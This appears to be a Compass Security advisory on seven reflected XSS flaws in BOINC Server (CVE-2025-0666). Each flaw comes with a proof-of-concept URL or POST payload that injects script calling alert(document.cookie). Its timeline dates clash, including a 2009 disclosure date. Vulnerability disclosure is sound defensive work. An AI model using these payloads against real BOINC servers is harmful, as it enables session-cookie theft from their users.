############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: BOINC Server # Vendor: BOINC # CSNC ID: CSNC-2025-002 # CVE ID: CVE-2025-0666 # Subject: Multiple reflected XSS Injections # Risk: High # Effect: Remotely exploitable # Researcher: Raphaël Arrouas (Xel) via Managed Bugbounty Program # Coordinator: Michael Häseler # Date: 21.01.2025 # ############################################################# Introduction ------------ BOINC is a software platform for "volunteer computing": large-scale distributed high-throughput computing using volunteered home computers and other resources. [1] Affected -------- Vulnerable: * All versions <= 1.4.7 Not vulnerable: * All versions > 1.4.7 Not tested: * Technical Description --------------------- # Vulnerability 1 There is a reflected XSS in the "venue" parameter of the host_venue_action.php module. This can be triggered by issuing a GET request with the the "venue" parameter value The full URL to trigger the XSS payload will look like: https:///host_venue_action.php?venue=%3Csvg/onload=alert(document.cookie)%3E # Vulnerability 2 There is a reflected XSS by XML injection in the "request" parameter of the job_file.php module. To exploit it the following payload can be inserted into the "request" parameter of a POST request to the job_file.php endpoint: <script xmlns="http://www.w3.org/1999/ xhtml">alert(document.cookie)<![CDATA[]] ></script> # Vulnerability 3 There is a reflected XSS affecting the "cols" parameter in the prefs_edit.php module. This can be triggered by issuing a GET request with the the "cols" parameter value > The full URL to trigger the XSS payload will look like: https:///prefs_edit.php?subset=global&cols=%3E%3C/a%3E%3Csvg/onload=alert(document.cookie)%3E # Vulnerability 4 There is a reflected XSS affecting the in the openid_login.php module. This can be triggered by issuing a GET request with the the value > for the query string. The full URL to trigger the XSS payload will look like: https:///openid_login.php?zzzz=%3Csvg/onload=alert(document.cookie)%3E # Vulnerability 5 There is a reflected XSS affecting the "result_name" parameter in the get_output.php module. Specifically the result_file sub command is vulnerable. This can be triggered by issuing a GET request with the the "result_name" parameter value The full URL to trigger the XSS payload will look like: https:///get_output.php?cmd=result_file&auth_str=zz&result_name=%3Csvg/onload=alert(document.cookie)%3E&file_num=1 # Vulnerability 6 There is a reflected XSS affecting the "wu_name" parameter in the get_output.php module. Specifically the workunit_file sub command is vulnerable. This can be triggered by issuing a GET request with the the "wu_name" parameter value The full URL to trigger the XSS payload will look like: https:///get_output.php?cmd=workunit_file&auth_str=zz&wu_name=%3Csvg/onload=alert(document.cookie)%3E&file_num=1 # Vulnerability 7 There is a reflected XSS by XML injection in the "request" parameter of the submit_rpc_handler.php module. To exploit it the following payload can be inserted into the "request" parameter of a POST request to the submit_rpc_handler.php endpoint: <script xmlns="http://www.w3.org/1999/ xhtml">alert(document.cookie)<![CDATA[]]>&l t;/script> Workaround / Fix ---------------- Update to the most recent version of BOINC Server. Timeline -------- 2024-12-19: Discovery of vulnerbility #1 by Hunter 2024-12-20: Discovery of vulnerbility #2-7 by Hunter 2025-01-27: Assigned CVE-2025-0666 2025-02-03: Initial vendor notification 2025-03-12: Initial vendor response 2025-03-17: Release of fixed Version / Patch 2009-XX-XX: Public disclosure date References ---------- [1] https://github.com/BOINC/boinc